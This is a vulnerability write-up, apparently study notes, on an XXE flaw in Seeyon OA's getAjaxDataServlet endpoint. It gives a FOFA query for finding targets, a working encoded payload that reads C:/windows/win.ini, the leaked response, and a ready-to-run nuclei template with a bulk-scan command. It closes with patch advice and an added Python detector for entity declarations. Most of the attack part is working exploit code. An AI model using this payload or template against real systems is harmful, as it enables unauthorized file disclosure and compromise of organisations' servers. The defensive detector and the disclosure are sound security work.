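Disclaimer: This article is shared as study notes for technical learning and reference only. Do not use it for illegal purposes. Any direct or indirect consequences or losses caused by any individual or organization using the information provided here are the sole responsibility of the user and have nothing to do with this platform or the publisher.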

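Vulnerability name

Seeyon OA getAjaxDataServlet XXE vulnerability

Affected product

Seeyon OA (致远互联-OA)

Vulnerability description

The Seeyon collaborative operations platform serves as an enterprise's digital-intelligent operations hub, helping enterprises run office work, finance, management and operations as one integrated system, strengthen connections, make good use of data for decision-making, and achieve full digitalization. The system's getAjaxDataServlet endpoint has an XXE vulnerability: an attacker can craft malicious entity declarations in the XML, which can lead to disclosure of server data and remote control of the server.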

FOFA search query

app="致远互联-OA"

Reproduction

Send the following request to the test target to read the contents of C://windows//win.ini


POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

The response is as follows


HTTP/1.1 200
Connection: close
Content-Length: 1007
Content-Type: text/html;charset=utf-8
Date: Mon, 08 Jan 2024 04:25:57 GMT
Server: SY8045
Set-Cookie: JSESSIONID=0DA12779FEE71DF69052322AD81A3096; Path=/seeyon; HttpOnly








<!DOCTYPE html>
<html>
<head>
<title>异常处理页面</title>


<link rel="stylesheet" href="/seeyon/common/all-min.css?V=V8_0_200613_25650">
<script type="text/javascript">
if(parent && parent.errorHandle)
    parent.errorHandle("");
</script>
</head>
<body class="page_color">

    提示信息:<BR/>系统级错误,请检查localhost.log查看详细异常堆栈:<br/>com.kg.commons.KgException [err=[KgCommonsError [code=100000,msg=系统异常]]]
 invoke param:[KgSignatureInfo [textinfo=KgTextInfo [signText=null, fontName=宋体, fontColor=18, fontSize=12, fontStyle=0, posType=CENTER_MIDDLE, breakWord=true], waterImg=null, elemId=null, left=0, top=0], [KgProtectedData [fieldName=id, fieldDesc=caption, fieldValue=; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
, encodeValue=OyBmb3IgMTYtYml0IGFwcCBzdXBwb3J0Cltmb250c10KW2V4dGVuc2lvbnNdClttY2kgZXh0ZW5zaW9uc10KW2ZpbGVzXQpbTWFpbF0KTUFQST0xCg==]]]


</body>
</html>

The response contains the file contents, so the vulnerability is reproduced successfully.

nuclei PoC

The PoC file contents are as follows


id: seeyon-getAjaxDataServlet-xxe

info:
  name: 致远OA getAjaxDataServlet XXE漏洞
  author: fgz
  severity: critical
  description: 致远互联协同运营平台,打造企业数智运营中枢,助力企业实现办公业务、财务、管理与运营的一体化运作,帮助企业加强链接、用好数据做好决策,全面实现数字化。该系统getAjaxDataServlet接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器数据泄露以及被远控。
  metadata:
    max-request: 1
    fofa-query: app="致远互联-OA"
    verified: true
requests:
  - raw:
      - |+
        POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        
        S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'for 16-bit app')"

Run the PoC

nuclei.exe -t mypoc/致远/seeyon-getAjaxDataServlet-xxe.yaml -l data/致远互联-OA.txt

Remediation

Upgrade to the latest version or apply the officially released patch.

https://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=170
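
Until the patch is applied, logged or proxied requests to this endpoint can be screened for DTD and entity declarations in the xmlValue parameter, which a signature-field document has no reason to carry. The Python below is an added example, not part of the original post or of Seeyon's code; the function names, finding labels and sample bodies are constructed for illustration, and it assumes the inspecting component can see the request body.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Endpoint and parameter taken from the request shown on this page.
ENDPOINT = "/seeyon/m-signature/RunSignature/run/getAjaxDataServlet"
XML_PARAM = "xmlValue"

# Any DTD is unexpected here; an entity with SYSTEM/PUBLIC is the XXE pattern.
DTD_RE = re.compile(r"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)
EXTERNAL_RE = re.compile(r"<!\s*ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b", re.IGNORECASE)

# Constructed sample bodies (not captured traffic).
BENIGN = ("S=ajaxColManager&M=colDelLock&xmlValue=%3CSignature%3E%3CField%3E"
          "%3Ca+Index%3D%22ID%22%3Eid%3C%2Fa%3E%3C%2FField%3E%3C%2FSignature%3E")
SUSPECT = ("xmlValue=%3C%21DOCTYPE+foo+%5B%3C%21ENTITY+x+SYSTEM+%22file%3A%2F%2F"
           "%2Fconstructed%2Fexample.txt%22%3E%5D%3E%3CSignature%2F%3E")
DOUBLE = SUSPECT.replace("%", "%25")  # same body, percent-encoded twice


def decode_fully(value, max_rounds=3):
    """Undo nested percent-encoding so a re-encoded body is still inspected."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(method, path, body):
    """Return findings for one request; an empty list means nothing flagged."""
    # Ignore the query string and path parameters such as ;jsessionid=...
    clean_path = path.split("?", 1)[0].split(";", 1)[0].rstrip("/")
    if method.upper() != "POST" or clean_path != ENDPOINT:
        return []
    findings = []
    for raw in parse_qs(body, keep_blank_values=True).get(XML_PARAM, []):
        xml = decode_fully(raw)  # parse_qs has already decoded one layer
        if EXTERNAL_RE.search(xml):
            findings.append("external-entity-declaration")
        elif DTD_RE.search(xml):
            findings.append("dtd-declaration")
    return findings


if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("suspect", SUSPECT), ("double", DOUBLE)):
        print(name, inspect_request("POST", ENDPOINT, body))
```

A flagged request that returned HTTP 200 with an exception page, as in the response above, is worth checking against localhost.log for the echoed fieldValue.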